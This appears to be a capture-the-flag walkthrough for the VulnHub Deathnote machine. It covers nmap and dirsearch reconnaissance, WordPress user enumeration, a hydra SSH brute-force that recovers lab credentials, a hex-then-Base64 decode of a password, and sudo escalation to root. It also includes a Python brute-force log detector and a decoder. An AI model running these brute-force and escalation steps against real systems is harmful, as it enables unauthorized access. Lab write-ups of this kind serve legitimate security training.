VulnHub: Deathnote
I. Information gathering
1. Live host scan
Target IP: 192.168.197.130
┌──(root㉿kali)-[~]
└─# nmap 192.168.197.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-24 09:39 CST
Nmap scan report for 192.168.197.1
Host is up (0.00016s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6000/tcp open X11
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.197.2
Host is up (0.000098s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:F2:C0:58 (VMware)
Nmap scan report for 192.168.197.130
Host is up (0.00032s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:83:6E:83 (VMware)
Nmap scan report for 192.168.197.254
Host is up (0.00017s latency).
All 1000 scanned ports on 192.168.197.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:FB:32:FE (VMware)
Nmap scan report for 192.168.197.128
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (5 hosts up) scanned in 9.96 seconds
2. Port scan
Only ports 22 and 80 are open.
┌──(root㉿kali)-[~]
└─# nmap -A -p- 192.168.197.130
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-24 09:41 CST
Nmap scan report for 192.168.197.130
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
| 256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_ 256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:83:6E:83 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 192.168.197.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.97 seconds
3. Directory brute-forcing
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.197.130 -x 403
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.197.130/_23-02-24_09-42-31.txt
Error Log: /root/.dirsearch/logs/errors-23-02-24_09-42-31.log
Target: http://192.168.197.130/
[09:42:31] Starting:
[09:42:54] 200 - 197B - /index.html
[09:42:57] 301 - 319B - /manual -> http://192.168.197.130/manual/
[09:42:57] 200 - 626B - /manual/index.html
[09:43:04] 200 - 68B - /robots.txt
[09:43:19] 200 - 7KB - /wordpress/wp-login.php
[09:43:19] 200 - 18KB - /wordpress/
Task Completed
II. Exploitation
1. Binding the IP to the domain name
Visit port 80.
Browsing to 192.168.197.130 redirects to a domain name that does not resolve.
After some searching, it turns out the IP has to be mapped to that domain name in the hosts file:
On Windows, edit C:\Windows\System32\drivers\etc\hosts
On Linux, edit /etc/hosts
On Windows the edited file may refuse to save; the file's permissions need to be changed first:
Right-click the hosts file -> Properties -> Security -> select the Users group -> Edit -> tick Modify and Write -> save.
Then add the IP and domain name.
On Linux, add the entry directly as root.
The site now loads.
It redirects straight to WordPress.
WordPress is a blogging platform written in PHP that has grown into a full content management system (CMS); anyone with a server that supports PHP and a MySQL database can host their own site on it.
2. Obtaining the admin username and password
The directory scan also turned up a login page (/wordpress/wp-login.php).
wpscan can enumerate users directly; it found a single username, kira:
┌──(root㉿kali)-[~]
└─# wpscan --url http://deathnote.vuln/wordpress/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://deathnote.vuln/wordpress/ [192.168.197.130]
[+] Started: Fri Feb 24 13:50:51 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://deathnote.vuln/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://deathnote.vuln/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://deathnote.vuln/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.1.1 identified (Latest, released on 2022-11-15).
| Found By: Rss Generator (Passive Detection)
| - http://deathnote.vuln/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.1.1</generator>
| - http://deathnote.vuln/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.1.1</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.7
| Style URL: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] kira
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://deathnote.vuln/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Feb 24 13:50:54 2023
[+] Requests Done: 24
[+] Cached Requests: 36
[+] Data Sent: 6.956 KB
[+] Data Received: 96.017 KB
[+] Memory used: 167.598 MB
[+] Elapsed time: 00:00:02
Brute-forcing the password for that account did not succeed, so another angle was needed.
The scan also turned up an image; viewing the page source showed a hint to look at the home page.
The hint pointed to a file and to L's comment, which contains a strange-looking string worth trying as a login.
Login succeeded:
3. SSH connection
A file was found (notes.txt, used as the wordlist below).
Using hydra (a brute-force tool) to brute-force the SSH password:
┌──(root㉿kali)-[~]
└─# hydra -l l -P notes.txt 192.168.197.130 ssh
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-24 14:09:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 43 login tries (l:1/p:43), ~3 tries per task
[DATA] attacking ssh://192.168.197.130:22/
[22][ssh] host: 192.168.197.130 login: l password: death4me
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-24 14:09:47
This yields the user l
Password: death4me
Connect over SSH.
Two users are visible:
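The hydra run above produced 43 login attempts in about nine seconds from one source, followed by one success, which is exactly the pattern a defender can pick out of sshd's auth log. The following Python script is an added example, not part of the original writeup: it runs a failures-per-window check over a constructed auth.log excerpt (the IPs, PIDs and ports are made up) and reports every source/user pair that crossed the threshold and then logged in successfully.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(  # sshd login lines in Debian /var/log/auth.log format
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def build_sample_log():
    # Constructed auth.log excerpt, not from the page: 12 failed password
    # attempts for user 'l' from one source in 9 seconds, then a success,
    # plus an unrelated key login. IPs are documentation addresses.
    lines = [f"Feb 24 14:09:{min(38 + i, 46)} deathnote sshd[{1200 + i}]: "
             f"Failed password for l from 192.0.2.10 port {40000 + i} ssh2"
             for i in range(12)]
    lines.append("Feb 24 14:09:47 deathnote sshd[1299]: Accepted password "
                 "for l from 192.0.2.10 port 40099 ssh2")
    lines.append("Feb 24 14:12:03 deathnote sshd[1300]: Accepted publickey "
                 "for kira from 192.0.2.20 port 50100 ssh2")
    return "\n".join(lines)

SAMPLE_AUTH_LOG = build_sample_log()

def parse_auth_log(text):
    """Yield (timestamp, result, user, src); syslog stamps have no year, so one year is assumed."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield (datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
                   m["result"], m["user"], m["src"])

def detect_ssh_bruteforce(text, threshold=10, window_s=60):
    """Flag each (src, user) with >= threshold failures inside any window_s span;
    success_after marks a later Accepted login for the same pair (guess found)."""
    fails, accepts = defaultdict(list), defaultdict(list)
    for ts, result, user, src in parse_auth_log(text):
        (fails if result == "Failed" else accepts)[(src, user)].append(ts)
    window = timedelta(seconds=window_s)
    findings = {}
    for key, times in fails.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                later_ok = any(t >= times[i] for t in accepts[key])
                findings[key] = {"failures": len(times), "success_after": later_ok}
                break
    return findings
```

A single key-based login from another address is not flagged, which is the behaviour you want when the check feeds an alert rather than a block list.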
III. Privilege escalation
A user.txt is present.
Hmm, this needs decoding,
and I spent a long time on it and got nowhere.
Later, something turned up under /opt.
On Linux, /opt holds add-on software packages; it is a user-level program directory, comparable to D:/Software on Windows. A program installed under /opt keeps all of its data, libraries and so on in that one directory.
Converting the hexadecimal numbers to a string: it is Base16 (hex) encoded.
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
Decoding the hex gives:
cGFzc3dkIDoga2lyYWlzZXZpbCA=
This is itself Base64; decoding it yields the password:
passwd : kiraisevil
for the user kira.
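The two-layer decode above (Base16, then Base64) as an added Python example, not code from the original writeup: the hex dump is the one quoted above, and the decoder peels layers until nothing decodes any further, so it also handles a file that had been wrapped more than twice.

```python
import base64
import binascii

# The space-separated hex dump found under /opt on the target (quoted from the writeup).
HEX_DUMP = ("63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 "
            "59 57 6c 7a 5a 58 5a 70 62 43 41 3d")

def decode_layers(text, max_depth=5):
    """Peel Base16 (hex) or Base64 layers off `text` until the result is no
    longer a valid encoding. Returns the list of stages, outer to inner.
    The check is heuristic: plaintext that happens to be valid Base64 would be
    decoded one step too far, so inspect every stage, not only the last."""
    stages = [text.strip()]
    for _ in range(max_depth):
        compact = "".join(stages[-1].split())   # drop the spaces between bytes
        try:
            decoded = bytes.fromhex(compact).decode("ascii")
        except ValueError:                      # not hex, or not printable text
            try:
                decoded = base64.b64decode(compact, validate=True).decode("ascii")
            except (binascii.Error, ValueError):
                break                           # neither layer applies: done
        if decoded == stages[-1]:               # no progress (e.g. empty input)
            break
        stages.append(decoded)
    return stages

def recover_password(text):
    """Return the innermost stage, stripped of whitespace."""
    return decode_layers(text)[-1].strip()

if __name__ == "__main__":
    for depth, stage in enumerate(decode_layers(HEX_DUMP)):
        print(f"layer {depth}: {stage!r}")
```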
Connect over SSH as kira.
Check what this user is allowed to execute.
This user is allowed to execute everything, so root is obtained directly.